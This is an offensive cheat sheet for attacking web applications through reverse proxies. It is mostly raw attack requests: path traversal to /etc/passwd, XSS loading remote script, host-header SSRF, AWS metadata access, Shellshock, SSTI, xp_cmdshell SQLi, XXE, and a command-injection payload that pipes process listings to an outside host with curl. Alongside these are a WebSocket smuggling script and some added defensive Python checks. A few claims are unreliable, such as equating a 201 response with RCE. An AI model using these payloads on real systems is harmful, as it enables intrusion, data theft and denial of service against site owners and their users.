Attacking Secondary Context
Secondary Context in Web Applications
Secondary context refers to the different ways a web application can handle and process requests indirectly related to the main content. This often involves proxies, back-end servers, and intermediate services that might introduce additional security risks.
Identify Some "Hidden" Reverse HTTP Proxies
The heuristic rules used are the following:
- A 502 status code is returned (RFC 2616, section 14.31)
- A 483 status code is returned (RFC 3261, section 8.1.1.6)
- When using TRACE, the body contains the 'X-Forwarded-For' string
- 'Via' or 'X-Via' headers are detected
- Some fields are different between hops:
  - HTTP status codes
  - 'Server' headers
  - 'Content-Type' headers
  - 'Via' headers
  - HTML titles
  - HTML 'address' tags
  - 'X-Forwarded-For' values in body
Use the HTTP-Traceroute.py tool.
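As an added example that is not the page's own code or the HTTP-Traceroute.py tool, the function below applies the heuristics listed above to two constructed responses (the same request as seen at the edge host and at the hop behind it) plus a constructed TRACE body, and returns which rules fired; the hostnames, header values and bodies are made up.

```python
import re

# Constructed sample responses (not real captures): the same request as seen
# at the edge host and at the next hop behind it
EDGE_RESPONSE = {
    "status": 502,
    "headers": {"Server": "nginx/1.18.0", "Content-Type": "text/html",
                "Via": "1.1 edge-proxy"},
    "body": "<html><title>502 Bad Gateway</title><address>nginx</address></html>",
}
BACKEND_RESPONSE = {
    "status": 200,
    "headers": {"Server": "Apache/2.4.41", "Content-Type": "application/json"},
    "body": '{"ok": true}',
}
# Constructed body of a TRACE response, which echoes the request as the
# backend received it, including headers a proxy added on the way
TRACE_BODY = ("TRACE / HTTP/1.1\r\nHost: www.company.com\r\n"
              "X-Forwarded-For: 203.0.113.7\r\n")

def _header(resp, name):
    # Header names are case-insensitive, so normalise before lookup
    return {k.lower(): v for k, v in resp["headers"].items()}.get(name.lower())

def _html_tag(body, tag):
    m = re.search(r"<%s[^>]*>(.*?)</%s>" % (tag, tag), body, re.I | re.S)
    return m.group(1).strip() if m else None

def hidden_proxy_indicators(hop_a, hop_b, trace_body=""):
    """Apply the heuristics listed above and return the rules that fired."""
    hits = []
    for resp in (hop_a, hop_b):
        if resp["status"] == 502:
            hits.append("502 Bad Gateway returned (RFC 2616, section 14.31)")
        if resp["status"] == 483:
            hits.append("483 Too Many Hops returned (RFC 3261, section 8.1.1.6)")
        for name in ("Via", "X-Via"):
            if _header(resp, name):
                hits.append("%s header present: %s" % (name, _header(resp, name)))
        if "X-Forwarded-For" in resp["body"]:
            hits.append("X-Forwarded-For value in body")
    if "X-Forwarded-For" in trace_body:
        hits.append("TRACE body echoes X-Forwarded-For")
    # Fields that differ between hops point at something sitting in between
    if hop_a["status"] != hop_b["status"]:
        hits.append("status differs between hops: %d vs %d"
                    % (hop_a["status"], hop_b["status"]))
    for name in ("Server", "Content-Type", "Via"):
        a, b = _header(hop_a, name), _header(hop_b, name)
        if a != b:
            hits.append("%s differs between hops: %r vs %r" % (name, a, b))
    for tag in ("title", "address"):
        a, b = _html_tag(hop_a["body"], tag), _html_tag(hop_b["body"], tag)
        if a != b:
            hits.append("HTML <%s> differs between hops: %r vs %r" % (tag, a, b))
    return hits
```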
Identify Routing Of HTTP Request
Does /Endpoint-To-Proxy/../ Return Something Different Than / ?
Does /Endpoint-To-Proxy/../ Return Headers Different Than / ?
Try To Inject Encoded, Double OR Triple URL Encoded Characters In Parameters
e.g. https://www.company.com/api/path?id=%23
# -> %23
? -> %3F
& -> %26
/ -> %2F
@ -> %40
Try To Inject These Payloads (Encoded, Double OR Triple URL Encoded) After The URL
..%2f%23
..;/
..%00/
..%0d/
..%5c
..\
..%ff/
%2e%2e%2f
.%2e/
e.g. https://www.company.com/api/..%00/
Using OPTIONS Method for endpoint discovery
Use the OPTIONS Method to identify other endpoints
Check PUT Method
Try To Change The Request Method To PUT
If You Get 201 Created Then There Is RCE
PUT /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
// references
https://www.hackingarticles.in/multiple-ways-to-exploiting-put-method/
https://www.arridae.com/blogs/HTTP-PUT-method.php
https://asfiyashaikh.medium.com/exploiting-put-method-d2d0cd7ba662
Try To Append The .json Extension To Your Endpoints e.g. /endpoint-To-Proxy.json
To Get Sensitive Information -> Tweet
Smuggling via HTTP/2 Cleartext
Try To Figure Out Whether Any Endpoints Accept An HTTP/2 Cleartext (h2c) Upgrade; If Yes, Try To Smuggle Through Them Using A Tool e.g. h2csmuggler
Steps to reproduce:
1 - Collect All The Endpoints
2 - Put It In File Called e.g. url.txt
3 - Open Your Terminal
4 - Write This Command python3 h2csmuggler.py --scan-list url.txt --threads 5
Smuggling WebSockets
Smuggle WebSocket Endpoints
import socket
import sys

# First request: a WebSocket upgrade with an invalid Sec-WebSocket-Version,
# sent through the proxied endpoint
req1 = '''GET /Endpoint-To-Proxy/ HTTP/1.1
Host: company.com
Sec-WebSocket-Version: 1337
Upgrade: websocket

'''.replace('\n', '\r\n').encode()

# Second request: the internal endpoint, reusing the same TCP connection
req2 = '''GET /Internal-Endpoint HTTP/1.1
Host: localhost:PORT

'''.replace('\n', '\r\n').encode()

def main(netloc):
    host, port = netloc.split(':')
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, int(port)))
    sock.sendall(req1)
    sock.recv(4096)            # response to the upgrade attempt
    sock.sendall(req2)
    data = sock.recv(4096)
    data = data.decode(errors='ignore')
    print(data)                # response to the second request
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()

if __name__ == '__main__':
    main(sys.argv[1])          # e.g. company.com:80
-----------------------------------------------------------------------------
Steps to reproduce:
1 - Open Your Terminal
2 - Write This Command
python3 websocket-smuggler.py
XSS
XSS in Referer
Referer: "><script src=//me.xss.ht></script>
If There Is Nginx As Reverse Proxy Try To Inject Blind XSS Payloads
GET /Endpoint-To-Proxy/%3D%22img src='https://RandomString(10).id.burpcollaborator.net'%22%3E HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
Try To Inject XSS Payloads After Your Endpoints
GET /Endpoint-To-Proxy/"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
---------------------
// resources
https://medium.com/@saamux/reflected-xss-on-www-yahoo-com-9b1857cecb8c
https://medium.com/bugbountywriteup/900-xss-in-yahoo-recon-wins-65ee6d4bfcbd
https://medium.com/@saamux/filter-bypass-to-reflected-xss-on-https-finance-yahoo-com-mobile-version-22b854327b27
Host Header Injection
GET /Endpoint-To-Proxy HTTP/1.1
Host: RandomString(10).id.burpcollaborator.net
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
-----------------------------------------------------------
// Ambiguate The Host Header
Host: company.com@RandomString(10).id.burpcollaborator.net
Host: company.com:@RandomString(10).id.burpcollaborator.net
Host: company.com:RandomString(10).id.burpcollaborator.net
Host: RandomString(10).id.burpcollaborator.net
Host: localhost
Host: company.com:PORT
----------------
Host: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
---------------------
//Space-surrounded Host Header
Host: www.company.com
Host: RandomString(10).id.burpcollaborator.net
-------------------------
//Change Host Header To host Header
host: company.com
------------------------
// Remove The Space In The Host Header
Host:www.company.com
----------------
// Add Tab Instead Of The Space That In The Host Header
Host: www.company.com
----------------------------
// Add /, :, \x00, \x20, \x09 OR \xad After The Value Of The Host Header
Host: www.company.com sensitive-file.txt
----------------------------------------
// Override The Host Header e.g. POST https://company.com
// AND Change Host Header e.g Host: RandomString(10).id.burpcollaborator.net
// To Get SSRF
GET https://company.com/Endpoint-To-Proxy HTTP/1.1
Host: RandomString(10).id.burpcollaborator.net
--------------------------------------
// Spoof The Original IP
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
X-Forwarded-For: 0000::1
Source: https://hackerone.com/reports/44513
-------------------------------
GET /Endpoint-To-Proxy HTTP/1.0
Host: www.company.com
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
Source: https://twitter.com/ADITYASHENDE17/status/1305723250413105152
----------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
X-Forwarded-For: 0177.1
Source: https://twitter.com/agarri_fr/status/965196958011920384
-----------------------------------------------------
// Other Bypasses
X-Forwarded-For: 127.0.0.1\r
X_Forwarded_For: 127.0.0.1
Forwarded: for=127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Remote-User: admin
Referer: RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
----------
Referer: RandomString(10).id.burpcollaborator.net
Referer: RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
Origin: https://RandomString(10).id.burpcollaborator.net
--------------------------------------
# Inject Non-Standard Headers
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
X-Originating-IP: RandomString(10).id.burpcollaborator.net
X-WAP-Profile: https://RandomString(10).id.burpcollaborator.net
True-Client-IP: RandomString(10).id.burpcollaborator.net
----------------------------------------------------------------------------
# Double Non-Standard Headers
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-For: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
X-Client-IP: RandomString(10).id.burpcollaborator.net
--------------------------------------------------
# Sources
https://zeronights.ru/wp-content/themes/zeronights-2019/public/materials/4_ZN2019_Morozov_SSRF.pdf
https://blog.paloaltonetworks.com/2019/10/cloud-kubernetes-vulnerabilities/
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For
https://speakerdeck.com/bo0om/at-home-among-strangers?slide=8
https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded
https://www.slideshare.net/sergeybelove/attacking-thru-http-host-header
https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass
https://www.youtube.com/watch?v=zP4b3pw94s0
https://hackerone.com/reports/429617
https://medium.com/bugbountywriteup/identifying-escalating-http-host-header-injection-attacks-7586d0ff2c67
https://www.youtube.com/watch?v=V8f6gqrCbZU
https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet
Try To Change Routing Of The Request To Get SSRF
GET /Endpoint-To-Proxy@RandomString(10).id.burpcollaborator.net# HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
-------------------------------------------------
GET @RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1
GET :@RandomString(10).id.burpcollaborator.net/Endpoint-To-Proxy HTTP/1.1
GET /Endpoint-To-Proxy:@RandomString(5).id.burpcollaborator.net# HTTP/1.0
GET /Endpoint-To-Proxy@RandomString(5).id.burpcollaborator.net# HTTP/1.0
----------------------------------------------
// resources
https://www.youtube.com/watch?v=zP4b3pw94s0
https://www.youtube.com/watch?v=gluSEBZpplQ
https://www.contextis.com/us/blog/server-technologies-reverse-proxy-bypass
Blind XSS or Time-Based SQLi in X-Forwarded-For header
"><script src=//me.xss.ht></script>
";WAITFOR DELAY '0.0.20'--
Blind XSS or SQLi in User Agent
"><script src=//me.xss.ht></script>
'XOR(if(now()=sysdate(),sleep(30),0))OR'
User-Agent: Mozilla/5.0'XOR(if(now()=sysdate(),sleep(30),0))OR'
RCE in User Agent
User-Agent: { :;}; echo $(</etc/passwd)
Double Content-Type Header
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
parameter=value
Invalid Content-Type Header
Content-Type: */*
Inject l5d-dtab Header
If There Is A Linkerd Service, Try To Inject The l5d-dtab Header e.g. l5d-dtab: /$/inet/169.254.169.254/80
To Get AWS Metadata
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
l5d-dtab: /$/inet/169.254.169.254/80
Content-Length: Number
Origin: https://www.company.com
parameter=value
Content-Length Header With A Number But No Body Content, To Expose Internal Information
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Content-Length: Number
Origin: https://www.company.com
Cache Poisoning and DOS
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
--------------------------
GET /Endpoint-To-Proxy HTTP/1.1
User-Agent: Mozilla/5.0
Host: RandomString(10).id.burpcollaborator.net
Host: company.com
----------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
--------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com:PORT
--------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Host: www.company.com
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-----------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Server: RandomString(10).id.burpcollaborator.net
-------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: null
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
----------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: '-alert(1)-'
-> https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Forwarded-Scheme: nothttps
X-Forwarded-Host: RandomString(10).id.burpcollaborator.net
-> https://www.youtube.com/watch?v=j2RrmNxJZ5c
--------------------------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
X-Host: RandomString(10).id.burpcollaborator.net
--------------------------------------------------
X-Host: RandomString(10).id.burpcollaborator.net
------------------
X-Oversized-Header-1: xxxxx 20K xxxx
X-Oversized-Header-2: xxxxx 20K xxxx
---------------------------
X-Metachar-Header: \n
-> https://cpdos.org/
--------------------------------------------------
X-HTTP-Method-Override: PUT
- https://blog.appsecco.com/aws-ec2-imdsv2-versus-an-esoteric-http-method-8bc1b9616ae8
- https://cpdos.org/
----------------------
X-Forwarded-Port: 123
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
- https://hackerone.com/reports/409370
----------------------------------
X-Forwarded-SSL: off
- https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning
---------------------
Max-Forwards: 0
------------------------------
zTransfer-Encoding: xxxx
--------------
Accept_Encoding: xxxx
-------------------
Range: bytes=cow
-----------------------
User-Agent: xxxx 20K xxxx
------------------------
Try To Inject Keep-Alive, Transfer-Encoding, Trailer, Upgrade, Proxy-Authorization, TE,
Connection OR Proxy-Authenticate e.g. Connection: close, Cookie To Abuse Hop-By-Hop Headers
Connection: close, Cookie
- https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers
-----------------------------
Try To Inject ?%xx, %xx OR %xxx 20k xxx e.g. Endpoint-To-Proxy/%xx To
Do A DOS Attack
GET /Endpoint-To-Proxy/%xxx 20k xxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://hackerone.com/reports/500686
----------------------------
Try To Add A Parameter With A Value e.g. ?parameter=cache OR If There Are Already Parameters
Try To Add Another e.g. lang=en&parameter=cache To Achieve Cache Poisoning
GET /Endpoint-To-Proxy?parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
------------------------------------------------
Add Parameter With Large Value e.g. ?parameter=xxx 20K xxx
GET /Endpoint-To-Proxy?parameter=xxxx 20K xxxx HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
----------
GET /Endpoint-To-Proxy?_parameter=cache HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
- https://www.youtube.com/watch?v=bDxYWGxuVqE
;parameter=cache
--------------------------------------
GET /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
Connection: keep-alive
parameter=cache
_parameter=cache
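As an added example (not code from the page), the edge-side check below serves both the Host Header Injection section and the cache-poisoning and hop-by-hop cases above: it parses a raw request, requires exactly one allowlisted Host with no `@`, `:@`, embedded whitespace or duplicate, drops client-supplied X-Forwarded-*/X-Host style headers and any end-to-end header named in Connection, and flags oversized or control-character values. The hostname allowlist, the 4096-byte limit and the strict one-space header form are assumptions.

```python
import re

ALLOWED_HOSTS = {"www.company.com", "company.com"}  # assumed allowlist for this edge
# Client-supplied forwarding/override headers from this page; the edge sets
# these itself after validation and never passes client values through
FORWARDING_HEADERS = {
    "x-forwarded-for", "x-forwarded-host", "x-forwarded-server", "x-forwarded-scheme",
    "x-forwarded-port", "x-forwarded-ssl", "x-host", "x-client-ip", "x-originating-ip",
    "true-client-ip", "x-proxyuser-ip", "x-remote-user", "x-wap-profile", "forwarded",
    "x-http-method-override", "l5d-dtab", "max-forwards",
}
# Hop-by-hop headers (RFC 7230, section 6.1) are consumed here, never forwarded
HOP_BY_HOP = {"connection", "keep-alive", "proxy-authenticate", "proxy-authorization",
              "te", "trailer", "transfer-encoding", "upgrade"}
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:[0-9]{1,5})?$")
MAX_VALUE_LEN = 4096  # assumed per-value limit; oversized values are the cache/DoS cases

def parse_headers(raw):
    """Split the header block of a raw request into (name, raw_value) pairs,
    keeping order and duplicates so anomalies stay visible."""
    pairs = []
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:  # skip the request line
        if line == "":
            break
        name, _, value = line.partition(":")
        pairs.append((name, value))
    return pairs

def audit_request(raw):
    """Return (problems, headers_to_forward) for one raw client request."""
    pairs = parse_headers(raw)
    problems = []
    names = [n.strip().lower() for n, _ in pairs]
    for n in ("host", "content-type", "content-length"):
        if names.count(n) > 1:
            problems.append("duplicate %s header" % n)
    if "host" not in names:
        problems.append("missing Host header")
    # Names listed in Connection are hop-by-hop for this connection only
    listed = set()
    for name, value in pairs:
        if name.strip().lower() == "connection":
            listed |= {t.strip().lower() for t in value.split(",")}
    forward = []
    for name, value in pairs:
        n, v = name.strip().lower(), value.strip()
        # Strict form "Name: value": one space, no tabs, no trailing whitespace
        if name != name.strip() or value[:1] != " " or value != value.rstrip():
            problems.append("unexpected whitespace around %s" % n)
        if any(c in v for c in "\x00\t\r\n\xad"):
            problems.append("control or invisible character in %s" % n)
        if len(v) > MAX_VALUE_LEN:
            problems.append("oversized %s header (%d bytes)" % (n, len(v)))
        if n == "host" and (not HOST_RE.match(v)
                            or v.split(":")[0].lower() not in ALLOWED_HOSTS):
            problems.append("Host %r not in allowlist" % v)
        if n in FORWARDING_HEADERS:
            problems.append("client-supplied %s dropped" % n)
        elif n in listed and n not in HOP_BY_HOP:
            problems.append("Connection lists end-to-end header %s; dropped" % n)
        elif n not in HOP_BY_HOP and n not in listed:
            forward.append((name.strip(), v))
    return problems, forward
```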
LFI
If There Is Nginx As Reverse Proxy AND Weblogic As Backend Try To Use /#/../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/#/../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Origin: https://www.company.com
---------------------------------------
GET /../../../../../../../etc/passwd;/../Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /Endpoint-To-Proxy../../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
--------------------------------------------
GET /Endpoint-To-Proxy/..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
Try To Inject \..\.\..\.\..\.\..\.\..\.\..\.\Internal-Endpoint OR
\..\..\..\.\..\..\Internal-Endpoint\..\..\..\..\..\etc\passwd%3F.js
GET /Endpoint-To-Proxy\..\.\..\.\..\.\..\.\Internal-Endpoint HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------------
Let's Assume There Is Routing To Pulse Secure SSL VPN, So
Try To Inject This To Get The File /etc/hosts
GET /Endpoint-To-Proxy/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/# HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------------------
If There Is Apache As Reverse Proxy Try To Use /..// To Change Route Of Endpoints
GET /Endpoint-To-Proxy/..//../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
--------------------------------------------------
If There Is Apache As Reverse Proxy Try To Use %3F To Bypass Blacklist Of Endpoints
GET /Endpoint-To-Proxy/.git%3FAllowed HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------------
If There Is Nginx As Reverse Proxy AND Apache As Backend Try To Use //../ To Change Route Of Endpoints
GET /Endpoint-To-Proxy/../../../../../../../etc/passwd//../ HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------------------------
If There Is Nginx As Reverse Proxy Try To Use ..;/ To Bypass Blacklist Of Endpoints OR Bypass CORS
GET /Endpoint-To-Proxy/..;/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
---------------------------------------
GET /../../../../etc/passwd/..;/Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
----------------------------------------
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Varnish As Reverse Proxy
GeT /Endpoint-To-Proxy/../../../../../../etc/passwd HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
------------------------------------------
# If There Is Haproxy OR Varnish As Reverse Proxy
GET http://company.com/Endpoints-To-Proxy/.git HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
-------------------------------------
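As an added example (not from the page), the normaliser below serves both the URL-encoding payload list near the top of the page and the LFI section above: it percent-decodes up to three layers, treats `\`, `..;/`, `..%00/`, `..%ff/`, `#` and `%3F` the way a lenient backend might, and reports when the canonical path leaves the proxied prefix. The prefix /Endpoint-To-Proxy comes from the page; the decoding rules are assumptions about a lenient backend, useful for a WAF rule or for checking what a proxy actually forwards.

```python
from urllib.parse import unquote

def decode_layers(text, max_layers=3):
    """Percent-decode repeatedly (single, double, triple encoding) and return
    every layer. latin-1 keeps a one-to-one byte/char mapping so that %00 and
    %ff survive for inspection instead of becoming U+FFFD."""
    layers = [text]
    for _ in range(max_layers):
        nxt = unquote(layers[-1], encoding="latin-1")
        if nxt == layers[-1]:
            break
        layers.append(nxt)
    return layers

def normalize_path(decoded_path):
    """Resolve a decoded path the way a lenient backend might (assumption):
    backslashes as slashes, ';' path parameters and junk bytes after '..'
    removed, '#' kept as a literal segment, dot segments resolved.
    Returns (canonical_path, escaped_root)."""
    out, escaped = [], False
    for seg in decoded_path.replace("\\", "/").split("/"):
        seg = seg.split(";", 1)[0].strip("\x00\r\n\xff")  # ..;/ ..%00/ ..%0d/ ..%ff/
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            else:
                escaped = True
            continue
        out.append(seg)
    return "/" + "/".join(out), escaped

# Tokens from this page that only turn up in a path when someone is probing it
MARKERS = (("\\", "backslash separator"), ("..;", "path parameter after dot segment"),
           ("#", "fragment inside request target"), ("?", "encoded '?' inside path"),
           ("\x00", "NUL byte"), ("\xff", "0xFF byte"))

def audit_path(request_target, proxied_prefix="/Endpoint-To-Proxy"):
    """Return (canonical_path, findings) for the path part of a request target."""
    raw_path = request_target.partition("?")[0]  # a literal query is not path
    layers = decode_layers(raw_path)
    findings = []
    if len(layers) > 2:
        findings.append("%d layers of percent-encoding" % (len(layers) - 1))
    decoded = layers[-1]
    findings += [label for marker, label in MARKERS if marker in decoded]
    canonical, escaped = normalize_path(decoded)
    if escaped:
        findings.append("dot segments climb above the root")
    prefix = proxied_prefix.rstrip("/")
    if canonical != prefix and not canonical.startswith(prefix + "/"):
        findings.append("canonical path %s leaves %s" % (canonical, prefix))
    return canonical, findings
```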
RCE
Try To Change The Method To POST And Add A Body e.g. To Get RCE
POST /Endpoint-To-Proxy HTTP/1.1
Host: company.com
User-Agent: Mozilla/5.0
Referer: https://previous.com/path
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Connection: keep-alive
<?php phpinfo(); ?>
RCE in Content-Type Header
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader(Header,4*4)}.multipart/form-data
SSTI
GET /Endpoint-To-Proxy/(${T(java.lang.Runtime).getRuntime().exec('nslookup id.burpcollaborator.net')}) HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
SQLi
GET /Endpoint-To-Proxy/'xor(if(mid(database(),1,1)=0x41,sleep(30),0))or HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
CRLF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"value%0A%01%09Host:%20id.burpcollaborator.net"
}
Parameter Manipulation
Assume The Backend Endpoint Takes The Value Of One Parameter As A Path, So Inject ;@me.com, @me.com OR :@me.com (Encoded, Double OR Triple URL Encoded) To Get SSRF
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":";@RandomString(10).id.burpcollaborator.net"
}
Assume The Backend Endpoint Takes The Value Of One Parameter As A Rewrite Configuration e.g.
rewrite ^.*$ $arg_parameter;
So Inject e.g. LFI Payloads To Get e.g. LFI
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{ "parameter":"../../../../../../../../../../../../etc/passwd" }
RCE
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"${nslookup id.burpcollaborator.net}"}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"&nslookup me.com&'\"`0&nslookup me.com&`'"
}
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"0 -write |ps${IFS}aux|curl${IFS}http://me.com${IFS}-d${IFS}@-"
}
SQL Injection
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Origin: https://www.company.com
Content-Type: application/json
Content-Length: Number
{"parameter":"; DECLARE @command varchar(255); SELECT @command='ping id.burpcollaborator.net'; EXEC Master.dbo.xp_cmdshell @command; SELECT 1 as 'STEP'"}
Blind XSS
POST /Endpoint-To-Proxy HTTP/1.1
Host: www.company.com
Content-Type: application/json
Content-Length: Number
{
"parameter":"</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.stack=Error().stack,s.src=(/,/+/RandomString(10).id.burpcollaborator.net/).slice(2),document.documentElement.appendChild(s))//'>"
}
XXE
If The Body Of The Request Is JSON Data, Try To Convert It To XML With XXE Payloads
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<parame
POST /Endpoint-To-Proxy/ HTTP/1.1
Host: www.company.com
Content-Type: application/xml
Content-Length: Number
<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xml" href="http://RandomString(10).id.burpcollaborator.net/file.xsl"?>
<!DOCTYPE root PUBLIC "-//A/B/EN" http://RandomString(10).id.burpcollaborator.net/file.dtd [
<!ENTITY % remote SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
<!ENTITY xxe SYSTEM "http://RandomString(10).id.burpcollaborator.net/path">
%remote;
]>
<root>
<foo>&xxe;</foo>
<x xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="http://RandomString(10).id.burpcollaborator.net/" ></x>
<y xmlns=http://a.b/
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://a.b/
http:///RandomString(10).id.burpcollaborator.net/file.xsd">a</y>
</root>
RealWorld Examples

References